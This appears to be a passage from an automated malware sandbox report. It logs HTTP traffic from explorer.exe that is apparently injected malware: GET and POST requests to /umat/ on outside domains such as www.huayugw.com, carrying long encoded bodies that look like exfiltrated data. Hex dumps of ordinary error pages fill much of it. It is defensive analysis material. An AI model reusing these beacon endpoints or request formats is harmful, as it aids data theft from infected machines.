                                                                                                          Date: Fri, 03 Jun 2022 06:19:18 GMT
                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          X-Sorting-Hat-PodId: 228
                                                                                                          X-Sorting-Hat-ShopId: 64312672485
                                                                                                          X-Frame-Options: DENY
                                                                                                          X-ShopId: 64312672485
                                                                                                          X-ShardId: 228
                                                                                                          Vary: Accept
                                                                                                          X-Shopify-Stage: production
                                                                                                          Content-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8ce6b02f-253b-4e63-a29a-f49a2a4ce062
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-Download-Options: noopen
                                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                                          X-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8ce6b02f-253b-4e63-a29a-f49a2a4ce062
                                                                                                          X-Dc: gcp-europe-west1,gcp-us-east1,gcp-us-east1
                                                                                                          X-Request-ID: 8ce6b02f-253b-4e63-a29a-f49a2a4ce062
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 715650febf2091f9-FRA
                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                          Data Raw: 32 62 62 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 20
                                                                                                          Data Ascii: 2bb9<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Something went wrong.</title> <meta name="referrer" content="never" /> <style type="text/css">
                                                                                                          Jun 3, 2022 08:19:18.581734896 CEST11240INData Raw: 20 20 20 2a 20 7b 20 62 6f 72 64 65 72 3a 30 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 70 61 64 64 69 6e 67 3a 30 3b 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69
                                                                                                          Data Ascii: * { border:0; margin:0; padding:0; -moz-box-sizing:border-box; -webkit-box-sizing:border-box; box-sizing:border-box; } html,body { height:100%; border:0; margin:0; padding:0; font-family:"Helvetica Neue", Helvetica, Arial, sans-serif; f
                                                                                                          Jun 3, 2022 08:19:18.581804037 CEST11242INData Raw: 72 67 65 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 3b 20 7d 0a 0a 20 20 20 20 2e 72 65 71 75 65 73 74 2d 69 64 20 7b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 30 70 78 3b 20 66 6f
                                                                                                          Data Ascii: rge { font-size:20px; line-height:26px; } .request-id { padding-top:100px; font-size:13px; color:#ccc; } @media all and (min-width:500px) { body { padding:60px 0; } .wrapper { padding:20px 20px 20px 100px; } .ico sv
                                                                                                          Jun 3, 2022 08:19:18.581891060 CEST11243INData Raw: 22 23 46 46 46 46 46 46 22 20 73 6b 65 74 63 68 3a 74 79 70 65 3d 22 4d 53 53 68 61 70 65 47 72 6f 75 70 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 32 30 39 2e 33
                                                                                                          Data Ascii: "#FFFFFF" sketch:type="MSShapeGroup"></path> <path d="M209.391799,46.7144151 L217.83313,145.696755" id="Stroke-2" stroke="#B4B5B4" stroke-width="2" stroke-linecap="round" sketch:type="MSShapeGroup"></path>
                                                                                                          Jun 3, 2022 08:19:18.581964016 CEST11245INData Raw: 33 36 36 37 39 20 4c 32 31 38 2e 37 36 34 30 35 2c 31 35 36 2e 34 35 39 33 39 36 20 43 32 31 39 2e 30 32 35 37 36 35 2c 31 35 39 2e 34 38 33 33 39 36 20 32 31 36 2e 37 39 30 33 33 37 2c 31 36 32 2e 31 34 38 30 37 35 20 32 31 33 2e 37 37 32 34 37
                                                                                                          Data Ascii: 36679 L218.76405,156.459396 C219.025765,159.483396 216.790337,162.148075 213.772477,162.410264 L16.1782012,179.578868 C13.1603406,179.841057 10.5004737,177.601585 10.2387585,174.578264 L9.63057585,167.555547 L218.155867,149.436679 Z M63.166244
                                                                                                          Jun 3, 2022 08:19:18.582031965 CEST11246INData Raw: 30 2e 31 36 38 39 30 36 20 4c 31 33 2e 31 32 39 31 35 31 37 2c 31 36 37 2e 36 30 33 30 39 34 22 20 69 64 3d 22 46 69 6c 6c 2d 31 31 22 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 6b 65 74 63 68 3a 74 79 70 65 3d 22 4d 53 53 68 61 70 65 47
                                                                                                          Data Ascii: 0.168906 L13.1291517,167.603094" id="Fill-11" fill="#FFFFFF" sketch:type="MSShapeGroup"></path> <path d="M213.774511,150.168906 L13.1291517,167.603094" id="Stroke-12" stroke="#B4B5B4" stroke-width="2" stroke-linecap="roun
                                                                                                          Jun 3, 2022 08:19:18.582093000 CEST11247INData Raw: 30 33 34 31 38 35 38 2c 38 35 2e 35 30 31 33 35 38 35 20 43 36 33 2e 38 31 37 31 34 32 34 2c 38 34 2e 30 34 30 39 38 31 31 20 36 32 2e 30 36 33 37 38 36 34 2c 38 33 2e 33 36 30 33 37 37 34 20 35 39 2e 35 31 38 35 30 34 36 2c 38 33 2e 33 36 30 33
                                                                                                          Data Ascii: 0341858,85.5013585 C63.8171424,84.0409811 62.0637864,83.3603774 59.5185046,83.3603774 C58.6160619,83.3603774 57.6227647,83.4405283 56.2972384,83.6218868 C48.0525325,84.7487547 39.9285139,96.6892075 39.3074489,105.311547 C39.0077647,109.467849
                                                                                                          Jun 3, 2022 08:19:18.582148075 CEST11249INData Raw: 35 36 2e 36 32 36 34 39 31 20 34 32 2e 39 36 38 30 37 31 32 2c 31 35 36 2e 36 32 36 34 39 31 22 20 69 64 3d 22 46 69 6c 6c 2d 31 33 22 20 66 69 6c 6c 3d 22 23 45 32 41 44 32 43 22 20 73 6b 65 74 63 68 3a 74 79 70 65 3d 22 4d 53 53 68 61 70 65 47
                                                                                                          Data Ascii: 56.626491 42.9680712,156.626491" id="Fill-13" fill="#E2AD2C" sketch:type="MSShapeGroup"></path> <path d="M59.9456563,80.537434 C77.7395759,80.537434 73.8084241,102.396226 73.8084241,102.396226 C73.8084241,102.396226 75.08
                                                                                                          Jun 3, 2022 08:19:18.582185030 CEST11250INData Raw: 30 34 31 35 30 39 20 43 36 39 2e 35 31 33 38 35 34 35 2c 38 36 2e 30 33 31 38 34 39 31 20 36 34 2e 39 37 33 38 34 32 31 2c 38 33 2e 30 32 30 37 35 34 37 20 35 39 2e 35 31 37 38 32 36 36 2c 38 33 2e 30 32 30 37 35 34 37 20 43 35 38 2e 34 34 37 32
                                                                                                          Data Ascii: 041509 C69.5138545,86.0318491 64.9738421,83.0207547 59.5178266,83.0207547 C58.4472353,83.0207547 57.341387,83.1362264 56.2511331,83.2856604 C47.9759164,84.4159245 39.6112012,96.374717 38.9691176,105.287094 C38.5589164,110.985962 40.9184211,112
                                                                                                          Jun 3, 2022 08:19:18.582216978 CEST11251INData Raw: 33 33 34 2c 31 30 32 2e 35 38 32 33 34 20 43 36 34 2e 37 35 38 32 33 32 32 2c 31 30 33 2e 31 32 33 36 39 38 20 36 31 2e 34 32 37 38 30 35 2c 31 30 34 2e 39 38 32 31 31 33 20 36 30 2e 37 32 34 30 32 31 37 2c 31 30 37 2e 34 30 36 33 34 20 43 36 30
                                                                                                          Data Ascii: 334,102.58234 C64.7582322,103.123698 61.427805,104.982113 60.7240217,107.40634 C60.445356,108.368151 60.59113,109.300755 61.1579536,110.17834 C61.3755975,110.515245 61.5945975,110.876604 61.8176656,111.243396 C63.0238607,113.230868 64.2720929,


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          16192.168.2.44989023.227.38.7480C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:19:18.202693939 CEST11230OUTGET /umat/?bT7tPLpx=KCFtk2ByPIrj6EQbanamrSzf2WMHsV3o1++x6ahF6LksDSy9FlqjvwWpWYTFvIM6F0DF&Lls=Mzrp HTTP/1.1
                                                                                                          Host: www.theflysnare.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 3, 2022 08:19:18.260586023 CEST11233INHTTP/1.1 403 Forbidden
                                                                                                          Date: Fri, 03 Jun 2022 06:19:18 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding
                                                                                                          X-Sorting-Hat-PodId: 228
                                                                                                          X-Sorting-Hat-ShopId: 64312672485
                                                                                                          X-Dc: gcp-europe-west1
                                                                                                          X-Request-ID: 7cd6fc28-a7e1-4039-9e7f-7134e5189789
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          X-Download-Options: noopen
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 715650fedfd39bfb-FRA
                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c
                                                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al
                                                                                                          Jun 3, 2022 08:19:18.260644913 CEST11234INData Raw: 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72
                                                                                                          Data Ascii: ign-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{borde
                                                                                                          Jun 3, 2022 08:19:18.260694981 CEST11235INData Raw: 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a
                                                                                                          Data Ascii: "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "
                                                                                                          Jun 3, 2022 08:19:18.260750055 CEST11237INData Raw: 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0
                                                                                                          Data Ascii: " }, "ja": { "title": "", "content-title": "
                                                                                                          Jun 3, 2022 08:19:18.260791063 CEST11237INData Raw: 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20
                                                                                                          Data Ascii: translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace
                                                                                                          Jun 3, 2022 08:19:18.260831118 CEST11237INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          17192.168.2.449891154.36.145.11080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:19:23.618773937 CEST11252OUTPOST /umat/ HTTP/1.1
                                                                                                          Host: www.huayugw.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 414
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.huayugw.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.huayugw.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Data Raw: 62 54 37 74 50 4c 70 78 3d 35 4e 37 74 4d 52 42 54 76 77 6f 6c 49 44 57 70 49 57 6e 64 64 46 70 4f 35 30 45 50 48 35 43 6c 4c 30 76 38 7a 79 33 32 39 55 56 55 7e 38 28 73 28 71 55 47 69 34 57 6a 38 4e 68 79 68 37 52 4f 28 46 66 67 6e 71 44 4f 42 45 65 54 64 49 52 62 47 53 68 5a 6f 58 72 69 42 37 77 47 57 6f 65 77 35 69 79 35 65 57 38 59 34 74 4e 76 78 45 75 4b 4d 76 68 6f 36 34 67 53 61 69 43 49 69 47 53 38 58 31 77 34 4e 4a 72 74 6c 4c 4e 6e 72 49 77 50 68 53 6d 71 65 4d 65 41 77 4e 72 77 7a 6f 76 5a 39 72 32 58 45 5f 4c 4b 4a 67 72 79 65 44 62 36 31 50 4e 79 72 4d 72 78 45 67 28 69 30 70 59 38 70 39 36 59 56 59 47 67 72 51 4c 4c 51 33 44 53 30 76 44 34 46 49 4c 30 35 46 37 58 6f 73 56 4d 70 78 6d 72 79 70 30 52 28 62 61 7a 75 7a 63 4a 56 4e 70 52 31 4a 36 5a 37 65 38 34 59 66 50 49 6e 41 45 53 36 51 54 67 35 41 6d 67 56 61 4f 50 43 45 52 37 37 33 57 48 42 7a 57 69 41 6c 4a 66 67 41 74 63 47 70 4d 5f 63 42 4a 5a 76 33 45 75 36 67 6a 55 49 61 77 4b 41 44 55 33 55 6e 7e 50 70 7a 4f 35 77 4c 72 34 4e 51 78 37 53 42 34 43 6d 61 32 36 67 63 57 36 37 5f 56 32 4c 65 50 5a 48 55 52 63 78 4e 31 2d 64 7a 44 36 79 69 6b 6c 52 68 34 2d 64 5f 39 34 30 43 70 6a 58 39 32 55 35 34 37 70 6c 64 6c 70 53 51 42 78 67 50 31 77 7a 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: bT7tPLpx=5N7tMRBTvwolIDWpIWnddFpO50EPH5ClL0v8zy329UVU~8(s(qUGi4Wj8Nhyh7RO(FfgnqDOBEeTdIRbGShZoXriB7wGWoew5iy5eW8Y4tNvxEuKMvho64gSaiCIiGS8X1w4NJrtlLNnrIwPhSmqeMeAwNrwzovZ9r2XE_LKJgryeDb61PNyrMrxEg(i0pY8p96YVYGgrQLLQ3DS0vD4FIL05F7XosVMpxmryp0R(bazuzcJVNpR1J6Z7e84YfPInAES6QTg5AmgVaOPCER773WHBzWiAlJfgAtcGpM_cBJZv3Eu6gjUIawKADU3Un~PpzO5wLr4NQx7SB4Cma26gcW67_V2LePZHURcxN1-dzD6yiklRh4-d_940CpjX92U547pldlpSQBxgP1wzw).


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          18192.168.2.449892154.36.145.11080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 3, 2022 08:19:23.795093060 CEST11260OUTPOST /umat/ HTTP/1.1
                                                                                                          Host: www.huayugw.com
                                                                                                          Connection: close
                                                                                                          Content-Length: 36482
                                                                                                          Cache-Control: no-cache
                                                                                                          Origin: http://www.huayugw.com
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          Accept: */*
                                                                                                          Referer: http://www.huayugw.com/umat/
                                                                                                          Accept-Language: en-US
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Data Raw: 62 54 37 74 50 4c 70 78 3d 35 4e 37 74 4d 51 52 5f 6b 54 38 34 47 7a 61 77 50 6b 47 61 46 46 5a 41 34 45 41 45 4c 5a 65 36 50 42 4c 77 73 47 28 4c 38 56 74 30 30 73 7a 42 37 70 6c 62 69 35 4b 4b 78 65 45 37 6b 62 64 4a 28 45 33 65 6e 71 48 4f 41 46 6e 4e 61 70 42 68 47 30 64 65 73 33 72 4f 43 37 78 59 53 71 72 53 35 69 33 4a 65 57 6b 49 34 64 5a 76 77 69 71 4b 46 49 4e 6a 6c 49 67 55 54 45 69 4d 68 32 4f 68 58 32 41 61 4e 4d 54 74 6c 37 42 6e 36 5a 41 49 31 6b 75 70 58 38 65 4a 38 74 72 54 38 49 6a 6e 39 71 43 6c 45 2d 6e 4b 4a 56 44 79 63 54 37 36 38 63 56 78 28 4d 72 4f 41 67 28 6b 69 70 56 69 70 39 6d 55 56 63 7e 57 71 67 76 4c 4b 6e 44 54 69 74 69 62 53 72 53 38 31 6c 4f 39 6f 73 4a 6c 71 6a 53 4a 79 6f 49 39 35 6f 7a 57 79 69 77 6e 56 50 6c 33 7a 70 36 64 76 75 38 6a 59 66 50 4f 6e 41 45 38 36 51 50 67 35 44 57 67 55 35 6d 50 54 45 52 34 78 6e 57 42 49 54 58 77 4b 46 46 39 67 42 45 35 47 73 77 46 66 7a 74 5a 70 6e 55 75 76 7a 37 56 41 61 77 45 45 44 56 31 48 33 28 59 70 7a 4f 62 77 4b 72 6f 4e 69 46 37 55 53 67 43 67 34 75 36 69 4d 57 36 6e 76 56 30 41 2d 7a 4a 48 55 4a 59 78 49 52 45 63 41 76 36 7a 33 77 6c 66 67 34 2d 52 76 39 34 68 53 6f 6e 52 4f 66 76 31 62 65 6e 73 37 5a 6d 56 6b 67 50 31 4e 30 56 75 46 75 47 44 73 58 50 44 36 7a 78 34 39 68 64 28 74 47 30 4a 49 28 45 58 4b 54 64 7a 64 53 44 4f 4a 6d 59 4b 52 54 68 7a 66 56 4d 74 34 56 63 54 4c 52 48 28 47 46 65 30 48 75 69 56 50 54 32 54 43 53 6c 76 57 74 54 7a 71 62 30 73 5f 64 33 6e 52 4a 33 59 31 59 70 39 6c 45 6d 7e 76 4f 38 59 49 48 56 72 58 79 72 61 62 70 69 35 51 48 32 71 47 55 64 7e 64 48 52 6e 50 7a 52 6e 35 66 44 50 73 43 39 41 46 50 33 4f 6c 59 4f 7a 31 34 77 31 6d 4c 77 36 61 47 75 58 63 54 4e 34 67 4c 45 66 53 68 41 70 38 41 76 47 68 41 65 6f 70 6c 34 70 4e 46 69 64 44 74 71 7a 66 55 49 6b 6b 56 34 28 56 7e 6b 35 43 31 4e 75 78 49 52 49 7a 56 66 77 5a 53 4a 32 47 47 6c 74 41 32 61 50 5f 30 32 28 50 4d 35 47 6a 34 48 49 5f 6b 34 42 64 67 52 6c 43 66 47 38 52 4a 37 4f 76 37 76 56 32 4d 65 56 53 66 34 77 45 43 68 36 36 7e 62 61 59 75 32 30 39 32 79 51 5f 28 4f 74 37 7e 45 77 74 52 68 70 5a 43 45 6d 6b 4a 34 71 79 73 58 46 30 4d 2d 79 44 28 54 43 64 41 73 4b 65 33 4c 68 50 72 38 50 44 59 70 79 6f 7e 41 68 68 6b 43 70 35 48 77 4e 76 55 4f 7e 66 32 76 4a 68 67 63 37 5f 41 73 39 68 4a 4e 70 4a 79 47 79 66 35 77 63 4f 72 5a 33 71 61 51 6e 41 67 6f 6d 48 42 35 35 31 53 58 6b 36 77 6e 79 6d 47 74 77 5a 6a 72 47 32 53 36 48 63 76 78 7e 43 65 45 6c 41 45 49 71 54 50 72 28 73 75 38 68 33 6c 54 74 74 6e 48 6a 33 46 39 70 73 36 71 54 2d 35 51 6b 33 41 41 39 48 52 51 34 7a 33 6d 66 78 64 51 32 6e 31 73 67 31 59 6f 44 69 59 36 64 61 33 50 33 5a 47 77 49 46 71 44 36 59 57 64 38 64 73 2d 68 63 6c 4d 76 4a 36 72 37 47 33 37 4b 74 52 6c 71 54 66 38 77 59 73 35 51 64 31 30 50 69 57 50 6d 4d 34 4e 67 37 62 6a 52 45 6d 59 6c 56 58 7a 76 73 46 74 57 74 32 43 6a 56 74 54 6a 38 43 6e 38 52 5a 31 55 4d 4e 50 39 6c 7e 66 64 34 61 51 50 72 6a 36 44 49 47 30 37 49 50 5a 43 34 31 65 6e 77 36 79 53 73 71 39 6a 39 7a 48 31 78 63 46 72 6f 7e 72 38 6d 4c 64 61 6d 56 58 64 43 52 51 38 63 43 31 63 56 70 4e 51 77 55 70 72 74 39 2d 64 34 28 61 63 77 67 34 31 79 4b 38 66 30 70 67 79 4d 38 32 75 32 72 61 68 69 31 2d 45 6c 76 56 6f 66 74 75 6d 31 4a 4d 6c 70 6a 49 56 6c 47 48 70 67 62 61 41 62 38 71 4f 30 58 64 45 65 5a 62 41 5f 57 4e 75 39 33 74 58 37 37 73 7e 34 59 50 37 78 52 69 74 75 67 48 65 69 33 53 59 43 69 6c 37 45 42 68 36 30 4a 78 4e 67 63 64 48 4d 28 67 30 6b 6d 48 74 45 75 54 50 54 58 79 53 77 51 76 30 51 77 6e 62 46 32 30 37 4c 66 33 4e 4e 55 39 72 5f 53 64 78 39 69 38 32 53 32 31 6f 76 4e 62 6c 41 32 55 61 36 6e 36 6b 4b 7a 69 38 34 46 5f 61 7a 51 61 7e 32 52 56 44 41 58 46 59 4e 6b 6b 52 6b 73 67 50 32 79 43 35 65 4a 54 44 73 6f 55 63 4e 38 54 72 42 77 44 6a 49 48 30 56 7a 74 4a 6c 39 77 6e 6c 42 35 42 4c 2d 42 31 76 47 39 37 31 64 58 31 4e 53 4e 2d 4a 54 4d 71 72 39 33 2d 36 65 66 6e 46 73 32 50 69 39 41 66 71 58 68 6a 51 4d 73 57 59 74 4d 77 39 71 28 64 68 6a 32 41 61 70 7e 4f 28 49 77 58 39 5f 7e 46 73 56 59 62 73 47 74 5a 69 37 50 35 47 63 4a 6c 37 43 4f 62 38 69
                                                                                                          Data Ascii: 